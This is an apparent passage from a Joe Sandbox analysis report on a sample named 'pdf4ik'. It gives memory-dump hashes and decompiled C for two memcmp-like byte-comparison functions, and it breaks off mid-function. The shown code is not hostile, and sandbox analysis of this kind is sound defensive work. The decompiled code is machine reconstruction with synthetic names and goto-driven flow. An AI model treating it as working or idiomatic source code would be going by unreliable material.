                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c95593ca24c9f6d9f0c8856b0928ba0c2945fb95fb1fe3db055df8bf12a44c88
                                        • Instruction ID: dc106b218b5b734ecf949ede02c52b9a3395f07c57bc83b54710c0f1c6e89475
                                        • Opcode Fuzzy Hash: c95593ca24c9f6d9f0c8856b0928ba0c2945fb95fb1fe3db055df8bf12a44c88
                                        • Instruction Fuzzy Hash: 38F10771E002298FDB24CF68D881B9DB7B2BF89354F1581EEC44DA7742DA349A86DF50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E29DBAC02(void* __eax, void* __ecx) {
                                        				void* _t196;
                                        				signed int _t197;
                                        				void* _t200;
                                        				signed char _t205;
                                        				signed char _t206;
                                        				signed char _t207;
                                        				signed char _t209;
                                        				signed char _t210;
                                        				signed int _t215;
                                        				signed int _t291;
                                        				void* _t294;
                                        				void* _t296;
                                        				void* _t298;
                                        				void* _t300;
                                        				void* _t302;
                                        				void* _t305;
                                        				void* _t307;
                                        				void* _t309;
                                        				void* _t312;
                                        				void* _t314;
                                        				void* _t316;
                                        				void* _t319;
                                        				void* _t321;
                                        				void* _t323;
                                        				void* _t326;
                                        				void* _t328;
                                        				void* _t330;
                                        				void* _t333;
                                        				void* _t335;
                                        				void* _t337;
                                        
                                        				_t200 = __ecx;
                                        				_t196 = __eax;
                                        				if( *((intOrPtr*)(__eax - 0x1f)) ==  *((intOrPtr*)(__ecx - 0x1f))) {
                                        					_t291 = 0;
                                        					L17:
                                        					if(_t291 != 0) {
                                        						goto L1;
                                        					}
                                        					_t205 =  *(_t196 - 0x1b);
                                        					if(_t205 ==  *(_t200 - 0x1b)) {
                                        						_t291 = 0;
                                        						L28:
                                        						if(_t291 != 0) {
                                        							goto L1;
                                        						}
                                        						_t206 =  *(_t196 - 0x17);
                                        						if(_t206 ==  *(_t200 - 0x17)) {
                                        							_t291 = 0;
                                        							L39:
                                        							if(_t291 != 0) {
                                        								goto L1;
                                        							}
                                        							_t207 =  *(_t196 - 0x13);
                                        							if(_t207 ==  *(_t200 - 0x13)) {
                                        								_t291 = 0;
                                        								L50:
                                        								if(_t291 != 0) {
                                        									goto L1;
                                        								}
                                        								if( *(_t196 - 0xf) ==  *(_t200 - 0xf)) {
                                        									_t291 = 0;
                                        									L61:
                                        									if(_t291 != 0) {
                                        										goto L1;
                                        									}
                                        									_t209 =  *(_t196 - 0xb);
                                        									if(_t209 ==  *(_t200 - 0xb)) {
                                        										_t291 = 0;
                                        										L72:
                                        										if(_t291 != 0) {
                                        											goto L1;
                                        										}
                                        										_t210 =  *(_t196 - 7);
                                        										if(_t210 ==  *(_t200 - 7)) {
                                        											_t291 = 0;
                                        											L83:
                                        											if(_t291 != 0) {
                                        												goto L1;
                                        											}
                                        											_t294 = ( *(_t196 - 3) & 0x000000ff) - ( *(_t200 - 3) & 0x000000ff);
                                        											if(_t294 == 0) {
                                        												L5:
                                        												_t296 = ( *(_t196 - 2) & 0x000000ff) - ( *(_t200 - 2) & 0x000000ff);
                                        												if(_t296 == 0) {
                                        													L3:
                                        													_t197 = ( *(_t196 - 1) & 0x000000ff) - ( *(_t200 - 1) & 0x000000ff);
                                        													if(_t197 != 0) {
                                        														_t8 = (0 | _t197 > 0x00000000) - 1; // -1
                                        														_t197 = (_t197 > 0) + _t8;
                                        													}
                                        													L2:
                                        													return _t197;
                                        												}
                                        												_t215 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                                        												if(_t215 != 0) {
                                        													L86:
                                        													_t197 = _t215;
                                        													goto L2;
                                        												} else {
                                        													goto L3;
                                        												}
                                        											}
                                        											_t215 = (0 | _t294 > 0x00000000) + (0 | _t294 > 0x00000000) - 1;
                                        											if(_t215 == 0) {
                                        												goto L5;
                                        											}
                                        											goto L86;
                                        										}
                                        										_t298 = (_t210 & 0x000000ff) - ( *(_t200 - 7) & 0x000000ff);
                                        										if(_t298 == 0) {
                                        											L76:
                                        											_t300 = ( *(_t196 - 6) & 0x000000ff) - ( *(_t200 - 6) & 0x000000ff);
                                        											if(_t300 == 0) {
                                        												L78:
                                        												_t302 = ( *(_t196 - 5) & 0x000000ff) - ( *(_t200 - 5) & 0x000000ff);
                                        												if(_t302 == 0) {
                                        													L80:
                                        													_t291 = ( *(_t196 - 4) & 0x000000ff) - ( *(_t200 - 4) & 0x000000ff);
                                        													if(_t291 != 0) {
                                        														_t189 = (0 | _t291 > 0x00000000) - 1; // -1
                                        														_t291 = (_t291 > 0) + _t189;
                                        													}
                                        													goto L83;
                                        												}
                                        												_t183 = (0 | _t302 > 0x00000000) - 1; // -1
                                        												_t291 = (_t302 > 0) + _t183;
                                        												if(_t291 != 0) {
                                        													goto L1;
                                        												}
                                        												goto L80;
                                        											}
                                        											_t177 = (0 | _t300 > 0x00000000) - 1; // -1
                                        											_t291 = (_t300 > 0) + _t177;
                                        											if(_t291 != 0) {
                                        												goto L1;
                                        											}
                                        											goto L78;
                                        										}
                                        										_t171 = (0 | _t298 > 0x00000000) - 1; // -1
                                        										_t291 = (_t298 > 0) + _t171;
                                        										if(_t291 != 0) {
                                        											goto L1;
                                        										}
                                        										goto L76;
                                        									}
                                        									_t305 = (_t209 & 0x000000ff) - ( *(_t200 - 0xb) & 0x000000ff);
                                        									if(_t305 == 0) {
                                        										L65:
                                        										_t307 = ( *(_t196 - 0xa) & 0x000000ff) - ( *(_t200 - 0xa) & 0x000000ff);
                                        										if(_t307 == 0) {
                                        											L67:
                                        											_t309 = ( *(_t196 - 9) & 0x000000ff) - ( *(_t200 - 9) & 0x000000ff);
                                        											if(_t309 == 0) {
                                        												L69:
                                        												_t291 = ( *(_t196 - 8) & 0x000000ff) - ( *(_t200 - 8) & 0x000000ff);
                                        												if(_t291 != 0) {
                                        													_t164 = (0 | _t291 > 0x00000000) - 1; // -1
                                        													_t291 = (_t291 > 0) + _t164;
                                        												}
                                        												goto L72;
                                        											}
                                        											_t158 = (0 | _t309 > 0x00000000) - 1; // -1
                                        											_t291 = (_t309 > 0) + _t158;
                                        											if(_t291 != 0) {
                                        												goto L1;
                                        											}
                                        											goto L69;
                                        										}
                                        										_t152 = (0 | _t307 > 0x00000000) - 1; // -1
                                        										_t291 = (_t307 > 0) + _t152;
                                        										if(_t291 != 0) {
                                        											goto L1;
                                        										}
                                        										goto L67;
                                        									}
                                        									_t146 = (0 | _t305 > 0x00000000) - 1; // -1
                                        									_t291 = (_t305 > 0) + _t146;
                                        									if(_t291 != 0) {
                                        										goto L1;
                                        									}
                                        									goto L65;
                                        								}
                                        								_t312 = ( *(_t196 - 0xf) & 0x000000ff) - ( *(_t200 - 0xf) & 0x000000ff);
                                        								if(_t312 == 0) {
                                        									L54:
                                        									_t314 = ( *(_t196 - 0xe) & 0x000000ff) - ( *(_t200 - 0xe) & 0x000000ff);
                                        									if(_t314 == 0) {
                                        										L56:
                                        										_t316 = ( *(_t196 - 0xd) & 0x000000ff) - ( *(_t200 - 0xd) & 0x000000ff);
                                        										if(_t316 == 0) {
                                        											L58:
                                        											_t291 = ( *(_t196 - 0xc) & 0x000000ff) - ( *(_t200 - 0xc) & 0x000000ff);
                                        											if(_t291 != 0) {
                                        												_t139 = (0 | _t291 > 0x00000000) - 1; // -1
                                        												_t291 = (_t291 > 0) + _t139;
                                        											}
                                        											goto L61;
                                        										}
                                        										_t133 = (0 | _t316 > 0x00000000) - 1; // -1
                                        										_t291 = (_t316 > 0) + _t133;
                                        										if(_t291 != 0) {
                                        											goto L1;
                                        										}
                                        										goto L58;
                                        									}
                                        									_t127 = (0 | _t314 > 0x00000000) - 1; // -1
                                        									_t291 = (_t314 > 0) + _t127;
                                        									if(_t291 != 0) {
                                        										goto L1;
                                        									}
                                        									goto L56;
                                        								}
                                        								_t121 = (0 | _t312 > 0x00000000) - 1; // -1
                                        								_t291 = (_t312 > 0) + _t121;
                                        								if(_t291 != 0) {
                                        									goto L1;
                                        								}
                                        								goto L54;
                                        							}
                                        							_t319 = (_t207 & 0x000000ff) - ( *(_t200 - 0x13) & 0x000000ff);
                                        							if(_t319 == 0) {
                                        								L43:
                                        								_t321 = ( *(_t196 - 0x12) & 0x000000ff) - ( *(_t200 - 0x12) & 0x000000ff);
                                        								if(_t321 == 0) {
                                        									L45:
                                        									_t323 = ( *(_t196 - 0x11) & 0x000000ff) - ( *(_t200 - 0x11) & 0x000000ff);
                                        									if(_t323 == 0) {
                                        										L47:
                                        										_t291 = ( *(_t196 - 0x10) & 0x000000ff) - ( *(_t200 - 0x10) & 0x000000ff);
                                        										if(_t291 != 0) {
                                        											_t113 = (0 | _t291 > 0x00000000) - 1; // -1
                                        											_t291 = (_t291 > 0) + _t113;
                                        										}
                                        										goto L50;
                                        									}
                                        									_t107 = (0 | _t323 > 0x00000000) - 1; // -1
                                        									_t291 = (_t323 > 0) + _t107;
                                        									if(_t291 != 0) {
                                        										goto L1;
                                        									}
                                        									goto L47;
                                        								}
                                        								_t101 = (0 | _t321 > 0x00000000) - 1; // -1
                                        								_t291 = (_t321 > 0) + _t101;
                                        								if(_t291 != 0) {
                                        									goto L1;
                                        								}
                                        								goto L45;
                                        							}
                                        							_t95 = (0 | _t319 > 0x00000000) - 1; // -1
                                        							_t291 = (_t319 > 0) + _t95;
                                        							if(_t291 != 0) {
                                        								goto L1;
                                        							}
                                        							goto L43;
                                        						}
                                        						_t326 = (_t206 & 0x000000ff) - ( *(_t200 - 0x17) & 0x000000ff);
                                        						if(_t326 == 0) {
                                        							L32:
                                        							_t328 = ( *(_t196 - 0x16) & 0x000000ff) - ( *(_t200 - 0x16) & 0x000000ff);
                                        							if(_t328 == 0) {
                                        								L34:
                                        								_t330 = ( *(_t196 - 0x15) & 0x000000ff) - ( *(_t200 - 0x15) & 0x000000ff);
                                        								if(_t330 == 0) {
                                        									L36:
                                        									_t291 = ( *(_t196 - 0x14) & 0x000000ff) - ( *(_t200 - 0x14) & 0x000000ff);
                                        									if(_t291 != 0) {
                                        										_t88 = (0 | _t291 > 0x00000000) - 1; // -1
                                        										_t291 = (_t291 > 0) + _t88;
                                        									}
                                        									goto L39;
                                        								}
                                        								_t82 = (0 | _t330 > 0x00000000) - 1; // -1
                                        								_t291 = (_t330 > 0) + _t82;
                                        								if(_t291 != 0) {
                                        									goto L1;
                                        								}
                                        								goto L36;
                                        							}
                                        							_t76 = (0 | _t328 > 0x00000000) - 1; // -1
                                        							_t291 = (_t328 > 0) + _t76;
                                        							if(_t291 != 0) {
                                        								goto L1;
                                        							}
                                        							goto L34;
                                        						}
                                        						_t70 = (0 | _t326 > 0x00000000) - 1; // -1
                                        						_t291 = (_t326 > 0) + _t70;
                                        						if(_t291 != 0) {
                                        							goto L1;
                                        						}
                                        						goto L32;
                                        					}
                                        					_t333 = (_t205 & 0x000000ff) - ( *(_t200 - 0x1b) & 0x000000ff);
                                        					if(_t333 == 0) {
                                        						L21:
                                        						_t335 = ( *(_t196 - 0x1a) & 0x000000ff) - ( *(_t200 - 0x1a) & 0x000000ff);
                                        						if(_t335 == 0) {
                                        							L23:
                                        							_t337 = ( *(_t196 - 0x19) & 0x000000ff) - ( *(_t200 - 0x19) & 0x000000ff);
                                        							if(_t337 == 0) {
                                        								L25:
                                        								_t291 = ( *(_t196 - 0x18) & 0x000000ff) - ( *(_t200 - 0x18) & 0x000000ff);
                                        								if(_t291 != 0) {
                                        									_t63 = (0 | _t291 > 0x00000000) - 1; // -1
                                        									_t291 = (_t291 > 0) + _t63;
                                        								}
                                        								goto L28;
                                        							}
                                        							_t57 = (0 | _t337 > 0x00000000) - 1; // -1
                                        							_t291 = (_t337 > 0) + _t57;
                                        							if(_t291 != 0) {
                                        								goto L1;
                                        							}
                                        							goto L25;
                                        						}
                                        						_t51 = (0 | _t335 > 0x00000000) - 1; // -1
                                        						_t291 = (_t335 > 0) + _t51;
                                        						if(_t291 != 0) {
                                        							goto L1;
                                        						}
                                        						goto L23;
                                        					}
                                        					_t45 = (0 | _t333 > 0x00000000) - 1; // -1
                                        					_t291 = (_t333 > 0) + _t45;
                                        					if(_t291 != 0) {
                                        						goto L1;
                                        					}
                                        					goto L21;
                                        				} else {
                                        					__edx =  *(__ecx - 0x1f) & 0x000000ff;
                                        					__esi =  *(__eax - 0x1f) & 0x000000ff;
                                        					__esi = ( *(__eax - 0x1f) & 0x000000ff) - ( *(__ecx - 0x1f) & 0x000000ff);
                                        					if(__esi == 0) {
                                        						L10:
                                        						__esi =  *(__eax - 0x1e) & 0x000000ff;
                                        						__edx =  *(__ecx - 0x1e) & 0x000000ff;
                                        						__esi = ( *(__eax - 0x1e) & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
                                        						if(__esi == 0) {
                                        							L12:
                                        							__esi =  *(__eax - 0x1d) & 0x000000ff;
                                        							__edx =  *(__ecx - 0x1d) & 0x000000ff;
                                        							__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
                                        							if(__esi == 0) {
                                        								L14:
                                        								__esi =  *(__eax - 0x1c) & 0x000000ff;
                                        								__edx =  *(__ecx - 0x1c) & 0x000000ff;
                                        								__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                                        								if(__esi != 0) {
                                        									__edx = 0;
                                        									_t38 = (0 | __esi > 0x00000000) - 1; // -1
                                        									__esi = (__esi > 0) + _t38;
                                        								}
                                        								goto L17;
                                        							}
                                        							__edx = 0;
                                        							__edx = 0 | __esi > 0x00000000;
                                        							_t32 = __edx - 1; // -1
                                        							__esi = __edx + _t32;
                                        							if(__edx + _t32 != 0) {
                                        								goto L1;
                                        							}
                                        							goto L14;
                                        						}
                                        						__edx = 0;
                                        						__edx = 0 | __esi > 0x00000000;
                                        						_t26 = __edx - 1; // -1
                                        						__esi = __edx + _t26;
                                        						if(__edx + _t26 != 0) {
                                        							goto L1;
                                        						}
                                        						goto L12;
                                        					}
                                        					__edx = 0;
                                        					__edx = 0 | __esi > 0x00000000;
                                        					_t20 = __edx - 1; // -1
                                        					__esi = __edx + _t20;
                                        					if(__edx + _t20 != 0) {
                                        						goto L1;
                                        					}
                                        					goto L10;
                                        				}
                                        				L1:
                                        				_t197 = _t291;
                                        				goto L2;
                                        			}

































                                        0x00000000
                                        0x00000000
                                        0x29dbad31
                                        0x29dbac99
                                        0x29dbac9b
                                        0x29dbacb0
                                        0x29dbacb8
                                        0x29dbacba
                                        0x29dbaccf
                                        0x29dbacd7
                                        0x29dbacd9
                                        0x29dbacee
                                        0x29dbacf6
                                        0x29dbacf8
                                        0x29dbad01
                                        0x29dbad01
                                        0x29dbad01
                                        0x00000000
                                        0x29dbacf8
                                        0x29dbace2
                                        0x29dbace2
                                        0x29dbace8
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dbace8
                                        0x29dbacc3
                                        0x29dbacc3
                                        0x29dbacc9
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dbacc9
                                        0x29dbaca4
                                        0x29dbaca4
                                        0x29dbacaa
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dbac0a
                                        0x29dbac0a
                                        0x29dbac0e
                                        0x29dbac12
                                        0x29dbac14
                                        0x29dbac29
                                        0x29dbac29
                                        0x29dbac2d
                                        0x29dbac31
                                        0x29dbac33
                                        0x29dbac48
                                        0x29dbac48
                                        0x29dbac4c
                                        0x29dbac50
                                        0x29dbac52
                                        0x29dbac67
                                        0x29dbac67
                                        0x29dbac6b
                                        0x29dbac6f
                                        0x29dbac71
                                        0x29dbac73
                                        0x29dbac7a
                                        0x29dbac7a
                                        0x29dbac7a
                                        0x00000000
                                        0x29dbac71
                                        0x29dbac54
                                        0x29dbac58
                                        0x29dbac5b
                                        0x29dbac5b
                                        0x29dbac61
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dbac61
                                        0x29dbac35
                                        0x29dbac39
                                        0x29dbac3c
                                        0x29dbac3c
                                        0x29dbac42
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dbac42
                                        0x29dbac16
                                        0x29dbac1a
                                        0x29dbac1d
                                        0x29dbac1d
                                        0x29dbac23
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dbac23
                                        0x29dba0a3
                                        0x29dba0a3
                                        0x00000000

                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                        • Instruction ID: a6e4058f5495fda022831255ab5e3f047865c8240ad245a000140b5324d1e9ec
                                        • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                        • Instruction Fuzzy Hash: B7C1A173D1E5B305872A462D453822EFFE26EC1A4131BC399DDD53F98AC627AE02A5D0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E29DBA81A(void* __eax, void* __ecx) {
                                        				void* _t191;
                                        				signed int _t192;
                                        				void* _t195;
                                        				signed char _t200;
                                        				signed char _t201;
                                        				signed char _t202;
                                        				signed char _t203;
                                        				signed char _t205;
                                        				signed int _t210;
                                        				signed int _t284;
                                        				void* _t287;
                                        				void* _t289;
                                        				void* _t291;
                                        				void* _t293;
                                        				void* _t296;
                                        				void* _t298;
                                        				void* _t300;
                                        				void* _t303;
                                        				void* _t305;
                                        				void* _t307;
                                        				void* _t310;
                                        				void* _t312;
                                        				void* _t314;
                                        				void* _t317;
                                        				void* _t319;
                                        				void* _t321;
                                        				void* _t324;
                                        				void* _t326;
                                        				void* _t328;
                                        
                                        				_t195 = __ecx;
                                        				_t191 = __eax;
                                        				if( *((intOrPtr*)(__eax - 0x1e)) ==  *((intOrPtr*)(__ecx - 0x1e))) {
                                        					_t284 = 0;
                                        					L15:
                                        					if(_t284 != 0) {
                                        						goto L1;
                                        					}
                                        					_t200 =  *(_t191 - 0x1a);
                                        					if(_t200 ==  *(_t195 - 0x1a)) {
                                        						_t284 = 0;
                                        						L26:
                                        						if(_t284 != 0) {
                                        							goto L1;
                                        						}
                                        						_t201 =  *(_t191 - 0x16);
                                        						if(_t201 ==  *(_t195 - 0x16)) {
                                        							_t284 = 0;
                                        							L37:
                                        							if(_t284 != 0) {
                                        								goto L1;
                                        							}
                                        							_t202 =  *(_t191 - 0x12);
                                        							if(_t202 ==  *(_t195 - 0x12)) {
                                        								_t284 = 0;
                                        								L48:
                                        								if(_t284 != 0) {
                                        									goto L1;
                                        								}
                                        								_t203 =  *(_t191 - 0xe);
                                        								if(_t203 ==  *(_t195 - 0xe)) {
                                        									_t284 = 0;
                                        									L59:
                                        									if(_t284 != 0) {
                                        										goto L1;
                                        									}
                                        									if( *(_t191 - 0xa) ==  *(_t195 - 0xa)) {
                                        										_t284 = 0;
                                        										L70:
                                        										if(_t284 != 0) {
                                        											goto L1;
                                        										}
                                        										_t205 =  *(_t191 - 6);
                                        										if(_t205 ==  *(_t195 - 6)) {
                                        											_t284 = 0;
                                        											L81:
                                        											if(_t284 != 0) {
                                        												goto L1;
                                        											}
                                        											if( *(_t191 - 2) ==  *(_t195 - 2)) {
                                        												_t192 = 0;
                                        												L3:
                                        												return _t192;
                                        											}
                                        											_t287 = ( *(_t191 - 2) & 0x000000ff) - ( *(_t195 - 2) & 0x000000ff);
                                        											if(_t287 == 0) {
                                        												L4:
                                        												_t192 = ( *(_t191 - 1) & 0x000000ff) - ( *(_t195 - 1) & 0x000000ff);
                                        												if(_t192 != 0) {
                                        													_t8 = (0 | _t192 > 0x00000000) - 1; // -1
                                        													_t192 = (_t192 > 0) + _t8;
                                        												}
                                        												goto L3;
                                        											}
                                        											_t210 = (0 | _t287 > 0x00000000) + (0 | _t287 > 0x00000000) - 1;
                                        											if(_t210 != 0) {
                                        												_t192 = _t210;
                                        												goto L3;
                                        											}
                                        											goto L4;
                                        										}
                                        										_t289 = (_t205 & 0x000000ff) - ( *(_t195 - 6) & 0x000000ff);
                                        										if(_t289 == 0) {
                                        											L74:
                                        											_t291 = ( *(_t191 - 5) & 0x000000ff) - ( *(_t195 - 5) & 0x000000ff);
                                        											if(_t291 == 0) {
                                        												L76:
                                        												_t293 = ( *(_t191 - 4) & 0x000000ff) - ( *(_t195 - 4) & 0x000000ff);
                                        												if(_t293 == 0) {
                                        													L78:
                                        													_t284 = ( *(_t191 - 3) & 0x000000ff) - ( *(_t195 - 3) & 0x000000ff);
                                        													if(_t284 != 0) {
                                        														_t182 = (0 | _t284 > 0x00000000) - 1; // -1
                                        														_t284 = (_t284 > 0) + _t182;
                                        													}
                                        													goto L81;
                                        												}
                                        												_t176 = (0 | _t293 > 0x00000000) - 1; // -1
                                        												_t284 = (_t293 > 0) + _t176;
                                        												if(_t284 != 0) {
                                        													goto L1;
                                        												}
                                        												goto L78;
                                        											}
                                        											_t170 = (0 | _t291 > 0x00000000) - 1; // -1
                                        											_t284 = (_t291 > 0) + _t170;
                                        											if(_t284 != 0) {
                                        												goto L1;
                                        											}
                                        											goto L76;
                                        										}
                                        										_t164 = (0 | _t289 > 0x00000000) - 1; // -1
                                        										_t284 = (_t289 > 0) + _t164;
                                        										if(_t284 != 0) {
                                        											goto L1;
                                        										}
                                        										goto L74;
                                        									}
                                        									_t296 = ( *(_t191 - 0xa) & 0x000000ff) - ( *(_t195 - 0xa) & 0x000000ff);
                                        									if(_t296 == 0) {
                                        										L63:
                                        										_t298 = ( *(_t191 - 9) & 0x000000ff) - ( *(_t195 - 9) & 0x000000ff);
                                        										if(_t298 == 0) {
                                        											L65:
                                        											_t300 = ( *(_t191 - 8) & 0x000000ff) - ( *(_t195 - 8) & 0x000000ff);
                                        											if(_t300 == 0) {
                                        												L67:
                                        												_t284 = ( *(_t191 - 7) & 0x000000ff) - ( *(_t195 - 7) & 0x000000ff);
                                        												if(_t284 != 0) {
                                        													_t157 = (0 | _t284 > 0x00000000) - 1; // -1
                                        													_t284 = (_t284 > 0) + _t157;
                                        												}
                                        												goto L70;
                                        											}
                                        											_t151 = (0 | _t300 > 0x00000000) - 1; // -1
                                        											_t284 = (_t300 > 0) + _t151;
                                        											if(_t284 != 0) {
                                        												goto L1;
                                        											}
                                        											goto L67;
                                        										}
                                        										_t145 = (0 | _t298 > 0x00000000) - 1; // -1
                                        										_t284 = (_t298 > 0) + _t145;
                                        										if(_t284 != 0) {
                                        											goto L1;
                                        										}
                                        										goto L65;
                                        									}
                                        									_t139 = (0 | _t296 > 0x00000000) - 1; // -1
                                        									_t284 = (_t296 > 0) + _t139;
                                        									if(_t284 != 0) {
                                        										goto L1;
                                        									}
                                        									goto L63;
                                        								}
                                        								_t303 = (_t203 & 0x000000ff) - ( *(_t195 - 0xe) & 0x000000ff);
                                        								if(_t303 == 0) {
                                        									L52:
                                        									_t305 = ( *(_t191 - 0xd) & 0x000000ff) - ( *(_t195 - 0xd) & 0x000000ff);
                                        									if(_t305 == 0) {
                                        										L54:
                                        										_t307 = ( *(_t191 - 0xc) & 0x000000ff) - ( *(_t195 - 0xc) & 0x000000ff);
                                        										if(_t307 == 0) {
                                        											L56:
                                        											_t284 = ( *(_t191 - 0xb) & 0x000000ff) - ( *(_t195 - 0xb) & 0x000000ff);
                                        											if(_t284 != 0) {
                                        												_t131 = (0 | _t284 > 0x00000000) - 1; // -1
                                        												_t284 = (_t284 > 0) + _t131;
                                        											}
                                        											goto L59;
                                        										}
                                        										_t125 = (0 | _t307 > 0x00000000) - 1; // -1
                                        										_t284 = (_t307 > 0) + _t125;
                                        										if(_t284 != 0) {
                                        											goto L1;
                                        										}
                                        										goto L56;
                                        									}
                                        									_t119 = (0 | _t305 > 0x00000000) - 1; // -1
                                        									_t284 = (_t305 > 0) + _t119;
                                        									if(_t284 != 0) {
                                        										goto L1;
                                        									}
                                        									goto L54;
                                        								}
                                        								_t113 = (0 | _t303 > 0x00000000) - 1; // -1
                                        								_t284 = (_t303 > 0) + _t113;
                                        								if(_t284 != 0) {
                                        									goto L1;
                                        								}
                                        								goto L52;
                                        							}
                                        							_t310 = (_t202 & 0x000000ff) - ( *(_t195 - 0x12) & 0x000000ff);
                                        							if(_t310 == 0) {
                                        								L41:
                                        								_t312 = ( *(_t191 - 0x11) & 0x000000ff) - ( *(_t195 - 0x11) & 0x000000ff);
                                        								if(_t312 == 0) {
                                        									L43:
                                        									_t314 = ( *(_t191 - 0x10) & 0x000000ff) - ( *(_t195 - 0x10) & 0x000000ff);
                                        									if(_t314 == 0) {
                                        										L45:
                                        										_t284 = ( *(_t191 - 0xf) & 0x000000ff) - ( *(_t195 - 0xf) & 0x000000ff);
                                        										if(_t284 != 0) {
                                        											_t106 = (0 | _t284 > 0x00000000) - 1; // -1
                                        											_t284 = (_t284 > 0) + _t106;
                                        										}
                                        										goto L48;
                                        									}
                                        									_t100 = (0 | _t314 > 0x00000000) - 1; // -1
                                        									_t284 = (_t314 > 0) + _t100;
                                        									if(_t284 != 0) {
                                        										goto L1;
                                        									}
                                        									goto L45;
                                        								}
                                        								_t94 = (0 | _t312 > 0x00000000) - 1; // -1
                                        								_t284 = (_t312 > 0) + _t94;
                                        								if(_t284 != 0) {
                                        									goto L1;
                                        								}
                                        								goto L43;
                                        							}
                                        							_t88 = (0 | _t310 > 0x00000000) - 1; // -1
                                        							_t284 = (_t310 > 0) + _t88;
                                        							if(_t284 != 0) {
                                        								goto L1;
                                        							}
                                        							goto L41;
                                        						}
                                        						_t317 = (_t201 & 0x000000ff) - ( *(_t195 - 0x16) & 0x000000ff);
                                        						if(_t317 == 0) {
                                        							L30:
                                        							_t319 = ( *(_t191 - 0x15) & 0x000000ff) - ( *(_t195 - 0x15) & 0x000000ff);
                                        							if(_t319 == 0) {
                                        								L32:
                                        								_t321 = ( *(_t191 - 0x14) & 0x000000ff) - ( *(_t195 - 0x14) & 0x000000ff);
                                        								if(_t321 == 0) {
                                        									L34:
                                        									_t284 = ( *(_t191 - 0x13) & 0x000000ff) - ( *(_t195 - 0x13) & 0x000000ff);
                                        									if(_t284 != 0) {
                                        										_t81 = (0 | _t284 > 0x00000000) - 1; // -1
                                        										_t284 = (_t284 > 0) + _t81;
                                        									}
                                        									goto L37;
                                        								}
                                        								_t75 = (0 | _t321 > 0x00000000) - 1; // -1
                                        								_t284 = (_t321 > 0) + _t75;
                                        								if(_t284 != 0) {
                                        									goto L1;
                                        								}
                                        								goto L34;
                                        							}
                                        							_t69 = (0 | _t319 > 0x00000000) - 1; // -1
                                        							_t284 = (_t319 > 0) + _t69;
                                        							if(_t284 != 0) {
                                        								goto L1;
                                        							}
                                        							goto L32;
                                        						}
                                        						_t63 = (0 | _t317 > 0x00000000) - 1; // -1
                                        						_t284 = (_t317 > 0) + _t63;
                                        						if(_t284 != 0) {
                                        							goto L1;
                                        						}
                                        						goto L30;
                                        					}
                                        					_t324 = (_t200 & 0x000000ff) - ( *(_t195 - 0x1a) & 0x000000ff);
                                        					if(_t324 == 0) {
                                        						L19:
                                        						_t326 = ( *(_t191 - 0x19) & 0x000000ff) - ( *(_t195 - 0x19) & 0x000000ff);
                                        						if(_t326 == 0) {
                                        							L21:
                                        							_t328 = ( *(_t191 - 0x18) & 0x000000ff) - ( *(_t195 - 0x18) & 0x000000ff);
                                        							if(_t328 == 0) {
                                        								L23:
                                        								_t284 = ( *(_t191 - 0x17) & 0x000000ff) - ( *(_t195 - 0x17) & 0x000000ff);
                                        								if(_t284 != 0) {
                                        									_t56 = (0 | _t284 > 0x00000000) - 1; // -1
                                        									_t284 = (_t284 > 0) + _t56;
                                        								}
                                        								goto L26;
                                        							}
                                        							_t50 = (0 | _t328 > 0x00000000) - 1; // -1
                                        							_t284 = (_t328 > 0) + _t50;
                                        							if(_t284 != 0) {
                                        								goto L1;
                                        							}
                                        							goto L23;
                                        						}
                                        						_t44 = (0 | _t326 > 0x00000000) - 1; // -1
                                        						_t284 = (_t326 > 0) + _t44;
                                        						if(_t284 != 0) {
                                        							goto L1;
                                        						}
                                        						goto L21;
                                        					}
                                        					_t38 = (0 | _t324 > 0x00000000) - 1; // -1
                                        					_t284 = (_t324 > 0) + _t38;
                                        					if(_t284 != 0) {
                                        						goto L1;
                                        					}
                                        					goto L19;
                                        				} else {
                                        					__esi = __dl & 0x000000ff;
                                        					__edx =  *(__ecx - 0x1e) & 0x000000ff;
                                        					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
                                        					if(__esi == 0) {
                                        						L8:
                                        						__esi =  *(__eax - 0x1d) & 0x000000ff;
                                        						__edx =  *(__ecx - 0x1d) & 0x000000ff;
                                        						__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
                                        						if(__esi == 0) {
                                        							L10:
                                        							__esi =  *(__eax - 0x1c) & 0x000000ff;
                                        							__edx =  *(__ecx - 0x1c) & 0x000000ff;
                                        							__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                                        							if(__esi == 0) {
                                        								L12:
                                        								__esi =  *(__eax - 0x1b) & 0x000000ff;
